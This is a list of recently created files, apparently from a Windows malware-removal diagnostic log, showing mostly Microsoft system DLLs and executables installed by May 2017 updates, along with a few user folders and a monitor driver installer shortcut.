2017-05-09 21:39 - 2017-04-28 02:52 - 00790528 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.UI.dll
2017-05-09 21:39 - 2017-04-28 02:52 - 00584192 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\UIRibbonRes.dll
2017-05-09 21:39 - 2017-04-28 02:51 - 20505600 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\edgehtml.dll
2017-05-09 21:39 - 2017-04-28 02:49 - 00072192 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\tdc.ocx
2017-05-09 21:39 - 2017-04-28 02:49 - 00025088 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\odbcconf.dll
2017-05-09 21:39 - 2017-04-28 02:46 - 19335168 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mshtml.dll
2017-05-09 21:39 - 2017-04-28 02:46 - 00329728 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\webplatstorageserver.dll
2017-05-09 21:39 - 2017-04-28 02:46 - 00080384 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mshtmled.dll
2017-05-09 21:39 - 2017-04-28 02:45 - 00124928 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\iepeers.dll
2017-05-09 21:39 - 2017-04-28 02:44 - 00338432 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\iedkcs32.dll
2017-05-09 21:39 - 2017-04-28 02:44 - 00266240 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\dxtrans.dll
2017-05-09 21:39 - 2017-04-28 02:42 - 00806400 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\StoreAgent.dll
2017-05-09 21:39 - 2017-04-28 02:42 - 00663040 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msfeeds.dll
2017-05-09 21:39 - 2017-04-28 02:42 - 00636416 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\WpcWebFilter.dll
2017-05-09 21:39 - 2017-04-28 02:42 - 00367104 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\InstallAgentUserBroker.exe
2017-05-09 21:39 - 2017-04-28 02:41 - 01248768 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\AzureSettingSyncProvider.dll
2017-05-09 21:39 - 2017-04-28 02:40 - 11870208 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ieframe.dll
2017-05-09 21:39 - 2017-04-28 02:40 - 06292992 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Chakra.dll
2017-05-09 21:39 - 2017-04-28 02:40 - 02008576 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\inetcpl.cpl
2017-05-09 21:39 - 2017-04-28 02:40 - 00799232 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\TokenBroker.dll
2017-05-09 21:39 - 2017-04-28 02:40 - 00328704 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\InstallAgent.exe
2017-05-09 21:39 - 2017-04-28 02:40 - 00050176 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\cldapi.dll
2017-05-09 21:39 - 2017-04-28 02:39 - 05225984 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\d2d1.dll
2017-05-09 21:39 - 2017-04-28 02:39 - 03655680 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\jscript9.dll
2017-05-09 21:39 - 2017-04-28 02:39 - 02859520 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wininet.dll
2017-05-09 21:39 - 2017-04-28 02:38 - 03667456 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\D3DCompiler_47.dll
2017-05-09 21:39 - 2017-04-28 02:38 - 01019904 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\aadtb.dll
2017-05-09 21:39 - 2017-04-28 02:37 - 04559360 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\dbgeng.dll
2017-05-09 21:39 - 2017-04-28 02:37 - 01626624 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\urlmon.dll
2017-05-09 21:39 - 2017-04-28 02:34 - 00891904 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\autochk.exe
2017-05-09 21:39 - 2017-04-28 02:33 - 00089088 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\olepro32.dll
2017-05-09 21:39 - 2017-04-28 02:26 - 23677440 _____ (Microsoft Corporation) C:\WINDOWS\system32\edgehtml.dll
2017-05-09 21:39 - 2017-04-28 02:15 - 03672064 _____ (Microsoft Corporation) C:\WINDOWS\system32\win32kfull.sys
2017-05-09 21:39 - 2017-04-28 02:15 - 01051648 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.UI.dll
2017-05-09 21:39 - 2017-04-28 02:14 - 00584192 _____ (Microsoft Corporation) C:\WINDOWS\system32\UIRibbonRes.dll
2017-05-09 21:39 - 2017-04-28 02:11 - 00082944 _____ (Microsoft Corporation) C:\WINDOWS\system32\tdc.ocx
2017-05-09 21:39 - 2017-04-28 02:11 - 00035840 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\BasicRender.sys
2017-05-09 21:39 - 2017-04-28 02:11 - 00029696 _____ (Microsoft Corporation) C:\WINDOWS\system32\odbcconf.dll
2017-05-09 21:39 - 2017-04-28 02:09 - 00084992 _____ (Microsoft Corporation) C:\WINDOWS\system32\MshtmlDac.dll
2017-05-09 21:39 - 2017-04-28 02:09 - 00064512 _____ (Microsoft Corporation) C:\WINDOWS\system32\winsrv.dll
2017-05-09 21:39 - 2017-04-28 02:08 - 00457728 _____ (Microsoft Corporation) C:\WINDOWS\system32\webplatstorageserver.dll
2017-05-09 21:39 - 2017-04-28 02:08 - 00314880 _____ (Microsoft Corporation) C:\WINDOWS\system32\SettingsEnvironment.Desktop.dll
2017-05-09 21:39 - 2017-04-28 02:08 - 00096256 _____ (Microsoft Corporation) C:\WINDOWS\system32\mshtmled.dll
2017-05-09 21:39 - 2017-04-28 02:07 - 00140288 _____ (Microsoft Corporation) C:\WINDOWS\system32\iepeers.dll
2017-05-09 21:39 - 2017-04-28 02:06 - 01302528 _____ (Microsoft Corporation) C:\WINDOWS\system32\MSVPXENC.dll
2017-05-09 21:39 - 2017-04-28 02:06 - 00527360 _____ (Microsoft Corporation) C:\WINDOWS\system32\aadcloudap.dll
2017-05-09 21:39 - 2017-04-28 02:06 - 00386560 _____ (Microsoft Corporation) C:\WINDOWS\system32\iedkcs32.dll
2017-05-09 21:39 - 2017-04-28 02:06 - 00274944 _____ (Microsoft Corporation) C:\WINDOWS\system32\dxtrans.dll
2017-05-09 21:39 - 2017-04-28 02:05 - 01075712 _____ (Microsoft Corporation) C:\WINDOWS\system32\StoreAgent.dll
2017-05-09 21:39 - 2017-04-28 02:05 - 00224256 _____ (Microsoft Corporation) C:\WINDOWS\system32\ie4uinit.exe
2017-05-09 21:39 - 2017-04-28 02:04 - 23681024 _____ (Microsoft Corporation) C:\WINDOWS\system32\mshtml.dll
2017-05-09 21:39 - 2017-04-28 02:04 - 01878016 _____ (Microsoft Corporation) C:\WINDOWS\system32\AzureSettingSyncProvider.dll
2017-05-09 21:39 - 2017-04-28 02:04 - 00422400 _____ (Microsoft Corporation) C:\WINDOWS\system32\WpAXHolder.dll
2017-05-09 21:39 - 2017-04-28 02:04 - 00416256 _____ (Microsoft Corporation) C:\WINDOWS\system32\InstallAgentUserBroker.exe
2017-05-09 21:39 - 2017-04-28 02:03 - 01085440 _____ (Microsoft Corporation) C:\WINDOWS\system32\rpcss.dll
2017-05-09 21:39 - 2017-04-28 02:03 - 01027584 _____ (Microsoft Corporation) C:\WINDOWS\system32\modernexecserver.dll
2017-05-09 21:39 - 2017-04-28 02:03 - 00925696 _____ (Microsoft Corporation) C:\WINDOWS\system32\WpcWebFilter.dll
2017-05-09 21:39 - 2017-04-28 02:03 - 00751104 _____ (Microsoft Corporation) C:\WINDOWS\system32\msfeeds.dll
2017-05-09 21:39 - 2017-04-28 02:03 - 00056832 _____ (Microsoft Corporation) C:\WINDOWS\system32\cldapi.dll
2017-05-09 21:39 - 2017-04-28 02:02 - 01260544 _____ (Microsoft Corporation) C:\WINDOWS\system32\GamePanel.exe
2017-05-09 21:39 - 2017-04-28 02:01 - 02077184 _____ (Microsoft Corporation) C:\WINDOWS\system32\inetcpl.cpl
2017-05-09 21:39 - 2017-04-28 02:01 - 01886208 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppXDeploymentExtensions.onecore.dll
2017-05-09 21:39 - 2017-04-28 02:00 - 08244736 _____ (Microsoft Corporation) C:\WINDOWS\system32\Chakra.dll
2017-05-09 21:39 - 2017-04-28 01:59 - 04396032 _____ (Microsoft Corporation) C:\WINDOWS\system32\D3DCompiler_47.dll
2017-05-09 21:39 - 2017-04-28 01:59 - 03307008 _____ (Microsoft Corporation) C:\WINDOWS\system32\wininet.dll
2017-05-09 21:39 - 2017-04-28 01:59 - 02056192 _____ (Microsoft Corporation) C:\WINDOWS\system32\win32kbase.sys
2017-05-09 21:39 - 2017-04-28 01:59 - 01293824 _____ (Microsoft Corporation) C:\WINDOWS\system32\aadtb.dll
2017-05-09 21:39 - 2017-04-28 01:59 - 00373760 _____ (Microsoft Corporation) C:\WINDOWS\system32\InstallAgent.exe
2017-05-09 21:39 - 2017-04-28 01:58 - 12787200 _____ (Microsoft Corporation) C:\WINDOWS\system32\ieframe.dll
2017-05-09 21:39 - 2017-04-28 01:58 - 01054208 _____ (Microsoft Corporation) C:\WINDOWS\system32\TokenBroker.dll
2017-05-09 21:39 - 2017-04-28 01:57 - 05557760 _____ (Microsoft Corporation) C:\WINDOWS\system32\dbgeng.dll
2017-05-09 21:39 - 2017-04-28 01:57 - 04730368 _____ (Microsoft Corporation) C:\WINDOWS\system32\jscript9.dll
2017-05-09 21:39 - 2017-04-28 01:57 - 02800128 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppXDeploymentServer.dll
2017-05-09 21:39 - 2017-04-28 01:57 - 01803264 _____ (Microsoft Corporation) C:\WINDOWS\system32\urlmon.dll
2017-05-09 21:39 - 2017-04-28 01:54 - 00985600 _____ (Microsoft Corporation) C:\WINDOWS\system32\TSWorkspace.dll
2017-05-09 21:39 - 2017-04-28 01:54 - 00970240 _____ (Microsoft Corporation) C:\WINDOWS\system32\autochk.exe
2017-05-09 21:39 - 2017-04-28 01:54 - 00722944 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\srv2.sys
2017-05-09 21:39 - 2017-04-28 01:54 - 00414208 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\srv.sys
2017-05-09 21:39 - 2017-04-28 01:52 - 00218624 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Media.Streaming.ps.dll
2017-05-08 21:19 - 2017-05-08 21:19 - 00001654 _____ C:\Users\Public\Desktop\Launch Monitor Driver Installer.lnk
2017-05-08 21:18 - 2017-05-08 21:19 - 00000000 ____D C:\Program Files (x86)\MonitorDriver
2017-05-07 21:26 - 2017-05-07 21:26 - 00000000 ____D C:\ProgramData\Microsoft OneDrive
2017-05-07 21:24 - 2017-05-07 21:24 - 00000020 ___SH C:\Users\Dino\ntuser.ini
2017-05-07 21:24 - 2017-05-07 21:24 - 00000000 ____D C:\Users\Dino\AppData\Local\DBG
2017-05-07 18:11 - 2017-05-07 18:11 - 20374424 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\shell32.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 07931392 _____ (Microsoft Corporation) C:\WINDOWS\system32\twinui.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 06728192 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\twinui.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 04848440 _____ (Microsoft Corporation) C:\WINDOWS\explorer.exe
2017-05-07 18:11 - 2017-05-07 18:11 - 04469832 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\explorer.exe
2017-05-07 18:11 - 2017-05-07 18:11 - 04446208 _____ (Microsoft Corporation) C:\WINDOWS\system32\SettingsHandlers_nt.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 04175872 _____ (Microsoft Corporation) C:\WINDOWS\system32\StartTileData.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 02765824 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Shell.UnifiedTile.CuratedTileCollections.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 02651648 _____ (Microsoft Corporation) C:\WINDOWS\system32\dwmcore.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 02499584 _____ (Microsoft Corporation) C:\WINDOWS\system32\twinui.pcshell.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 02443776 _____ (Microsoft Corporation) C:\WINDOWS\system32\wuaueng.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 02435584 _____ (Microsoft Corporation) C:\WINDOWS\system32\ResetEngine.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 02298880 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\dwmcore.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 02085280 _____ (Microsoft Corporation) C:\WINDOWS\system32\UpdateAgent.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 01854880 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppVEntVirtualization.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 01760264 _____ (Microsoft Corporation) C:\WINDOWS\system32\WindowsCodecs.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 01657344 _____ (Microsoft Corporation) C:\WINDOWS\system32\XpsPrint.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 01628160 _____ (Microsoft Corporation) C:\WINDOWS\system32\comsvcs.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 01611776 _____ (Microsoft Corporation) C:\WINDOWS\system32\SpeechPal.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 01605632 _____ (Microsoft Corporation) C:\WINDOWS\system32\quartz.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 01600512 _____ (Microsoft Corporation) C:\WINDOWS\system32\dbghelp.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 01583616 _____ (Microsoft Corporation) C:\WINDOWS\system32\ieapfltr.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 01518088 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\WindowsCodecs.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 01506816 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\quartz.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 01468416 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppXDeploymentExtensions.desktop.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 01463296 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ieapfltr.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 01452960 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppVEntSubsystemController.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 01433600 _____ (Microsoft Corporation) C:\WINDOWS\system32\SystemSettings.Handlers.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 01356800 _____ (Microsoft Corporation) C:\WINDOWS\system32\audiosrv.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 01320352 _____ (Microsoft Corporation) C:\WINDOWS\system32\wpx.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 01295872 _____ (Microsoft Corporation) C:\WINDOWS\system32\dosvc.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 01291776 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\MSVPXENC.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 01285120 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\dbghelp.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 01269760 _____ (Microsoft Corporation) C:\WINDOWS\system32\enterprisecsps.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 01257472 _____ (Microsoft Corporation) C:\WINDOWS\system32\wpnapps.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 01242624 _____ (Microsoft Corporation) C:\WINDOWS\system32\SharedStartModel.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 01147296 _____ (Microsoft Corporation) C:\WINDOWS\system32\hvix64.exe
2017-05-07 18:11 - 2017-05-07 18:11 - 01103872 _____ (Microsoft Corporation) C:\WINDOWS\system32\SettingSyncCore.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 01087488 _____ (Microsoft Corporation) C:\WINDOWS\system32\reseteng.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 01060352 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\XpsPrint.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 01024416 _____ (Microsoft Corporation) C:\WINDOWS\system32\hvax64.exe
2017-05-07 18:11 - 2017-05-07 18:11 - 00987648 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wpnapps.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 00980992 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\bthport.sys
2017-05-07 18:11 - 2017-05-07 18:11 - 00974848 _____ (Microsoft Corporation) C:\WINDOWS\system32\mmgaserver.exe
2017-05-07 18:11 - 2017-05-07 18:11 - 00909312 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\SettingSyncCore.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 00864256 _____ (Microsoft Corporation) C:\WINDOWS\system32\NotificationController.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 00840192 _____ (Microsoft Corporation) C:\WINDOWS\system32\fveapi.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 00805888 _____ (Microsoft Corporation) C:\WINDOWS\system32\ieproxy.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 00750560 _____ (Microsoft Corporation) C:\WINDOWS\system32\fontdrvhost.exe
2017-05-07 18:11 - 2017-05-07 18:11 - 00750080 _____ (Microsoft Corporation) C:\WINDOWS\system32\StorSvc.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 00741784 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Internal.Shell.Broker.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 00731136 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mmgaserver.exe
2017-05-07 18:11 - 2017-05-07 18:11 - 00716440 _____ (Microsoft Corporation) C:\WINDOWS\system32\MSVideoDSP.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 00712600 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\dxgmms2.sys
2017-05-07 18:11 - 2017-05-07 18:11 - 00707072 _____ (Microsoft Corporation) C:\WINDOWS\system32\winlogon.exe
2017-05-07 18:11 - 2017-05-07 18:11 - 00687104 _____ (Microsoft Corporation) C:\WINDOWS\system32\LogonController.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 00681984 _____ (Microsoft Corporation) C:\WINDOWS\system32\usocore.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 00673280 _____ (Microsoft Corporation) C:\WINDOWS\system32\LockAppBroker.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 00673112 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppResolver.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 00651680 _____ (Microsoft Corporation) C:\WINDOWS\system32\SettingSyncHost.exe
2017-05-07 18:11 - 2017-05-07 18:11 - 00647168 _____ (Microsoft Corporation) C:\WINDOWS\system32\RDXService.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 00646656 _____ (Microsoft Corporation) C:\WINDOWS\system32\LockHostingFramework.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 00626520 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\fontdrvhost.exe
2017-05-07 18:11 - 2017-05-07 18:11 - 00624640 _____ (Microsoft Corporation) C:\WINDOWS\system32\AudioEndpointBuilder.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 00590848 _____ (Microsoft Corporation) C:\WINDOWS\system32\vbscript.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 00585728 _____ (Microsoft Corporation) C:\WINDOWS\system32\OneDriveSettingSyncProvider.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 00559000 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\SettingSyncHost.exe
2017-05-07 18:11 - 2017-05-07 18:11 - 00545792 _____ (Microsoft Corporation) C:\WINDOWS\system32\winspool.drv
2017-05-07 18:11 - 2017-05-07 18:11 - 00524800 _____ (Microsoft Corporation) C:\WINDOWS\system32\TileDataRepository.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 00523296 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\AppResolver.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 00517632 _____ (Microsoft Corporation) C:\WINDOWS\system32\daxexec.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 00510976 _____ (Microsoft Corporation) C:\WINDOWS\system32\TDLMigration.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 00507392 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\vbscript.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 00476672 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\OneDriveSettingSyncProvider.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 00450048 _____ (Microsoft Corporation) C:\WINDOWS\system32\bcdedit.exe
2017-05-07 18:11 - 2017-05-07 18:11 - 00433664 _____ (Microsoft Corporation) C:\WINDOWS\system32\msIso.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 00429568 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\winspool.drv
2017-05-07 18:11 - 2017-05-07 18:11 - 00409600 _____ (Microsoft Corporation) C:\WINDOWS\system32\updatehandlers.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 00409504 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\dxgmms1.sys
2017-05-07 18:11 - 2017-05-07 18:11 - 00406528 _____ (Microsoft Corporation) C:\WINDOWS\system32\InputSwitch.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 00392704 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\PlayToManager.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 00382368 _____ (Adobe Systems Incorporated) C:\WINDOWS\system32\atmfd.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 00364032 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msIso.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 00362496 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\daxexec.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 00358400 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ieproxy.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 00354360 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\bcryptprimitives.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 00354304 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\InputSwitch.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 00347136 _____ (Microsoft Corporation) C:\WINDOWS\system32\XpsDocumentTargetPrint.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 00334336 _____ (Microsoft Corporation) C:\WINDOWS\system32\wc_storage.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 00315392 _____ (Microsoft Corporation) C:\WINDOWS\system32\NotificationObjFactory.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 00311192 _____ (Adobe Systems Incorporated) C:\WINDOWS\SysWOW64\atmfd.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 00301056 _____ (Microsoft Corporation) C:\WINDOWS\system32\EnterpriseAppMgmtSvc.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 00296448 _____ (Microsoft Corporation) C:\WINDOWS\system32\CloudBackupSettings.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 00282112 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\VEEventDispatcher.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 00280064 _____ (Microsoft Corporation) C:\WINDOWS\system32\WiFiDisplay.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 00257024 _____ (Microsoft Corporation) C:\WINDOWS\system32\webcheck.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 00252928 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\XpsDocumentTargetPrint.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 00251904 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Gaming.Preview.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 00246272 _____ (Microsoft Corporation) C:\WINDOWS\system32\domgmt.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 00233472 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\WiFiDisplay.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 00232960 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\webcheck.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 00232960 _____ (Microsoft Corporation) C:\WINDOWS\system32\wcmcsp.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 00232448 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\CloudBackupSettings.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 00208896 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.UI.AppDefaults.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 00203776 _____ (Microsoft Corporation) C:\WINDOWS\system32\PackageStateRoaming.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 00175616 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\PackageStateRoaming.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 00164864 _____ (Microsoft Corporation) C:\WINDOWS\system32\EnterpriseModernAppMgmtCSP.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 00155136 _____ (Microsoft Corporation) C:\WINDOWS\system32\VEStoreEventHandlers.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 00142240 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\wcifs.sys
2017-05-07 18:11 - 2017-05-07 18:11 - 00128000 _____ (Microsoft Corporation) C:\WINDOWS\system32\mssprxy.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 00119296 _____ (Microsoft Corporation) C:\WINDOWS\system32\UserDataTimeUtil.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 00118784 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\netvsc.sys
2017-05-07 18:11 - 2017-05-07 18:11 - 00105456 _____ (Microsoft Corporation) C:\WINDOWS\system32\imagehlp.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 00095584 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\imagehlp.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 00094720 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\UserDataTimeUtil.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 00091648 _____ (Microsoft Corporation) C:\WINDOWS\system32\mfmjpegdec.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 00087552 _____ (Microsoft Corporation) C:\WINDOWS\system32\asycfilt.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 00081408 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mfmjpegdec.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 00078848 _____ (Microsoft Corporation) C:\WINDOWS\system32\offreg.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 00078336 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\asycfilt.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 00057856 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\offreg.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 00052736 _____ (Microsoft Corporation) C:\WINDOWS\system32\musdialoghandlers.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 00050176 _____ (Microsoft Corporation) C:\WINDOWS\system32\catsrvps.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 00047104 _____ (Adobe Systems) C:\WINDOWS\system32\atmlib.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 00038912 _____ (Adobe Systems) C:\WINDOWS\SysWOW64\atmlib.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 00032004 _____ C:\WINDOWS\system32\edgehtmlpluginpolicy.bin
2017-05-07 18:09 - 2017-05-07 18:09 - 00008192 _____ C:\WINDOWS\system32\config\userdiff
2017-05-07 18:09 - 2017-05-07 18:09 - 00000000 ____D C:\WINDOWS\SysWOW64\XPSViewer
2017-05-07 18:09 - 2017-05-07 18:09 - 00000000 ____D C:\Program Files\Reference Assemblies
2017-05-07 18:09 - 2017-05-07 18:09 - 00000000 ____D C:\Program Files\MSBuild
2017-05-07 18:09 - 2017-05-07 18:09 - 00000000 ____D C:\Program Files (x86)\Reference Assemblies
2017-05-07 18:09 - 2017-05-07 18:09 - 00000000 ____D C:\Program Files (x86)\MSBuild
2017-05-07 18:09 - 2017-05-07 17:13 - 00000000 ____D C:\WINDOWS\ServiceProfiles
2017-05-07 18:09 - 2017-02-10 12:26 - 01166520 _____ (Microsoft Corporation) C:\WINDOWS\system32\PresentationNative_v0300.dll
2017-05-07 18:09 - 2017-02-10 12:26 - 00124624 _____ (Microsoft Corporation) C:\WINDOWS\system32\PresentationCFFRasterizerNative_v0300.dll
2017-05-07 18:09 - 2017-02-10 12:26 - 00035480 _____ (Microsoft Corporation) C:\WINDOWS\system32\TsWpfWrp.exe
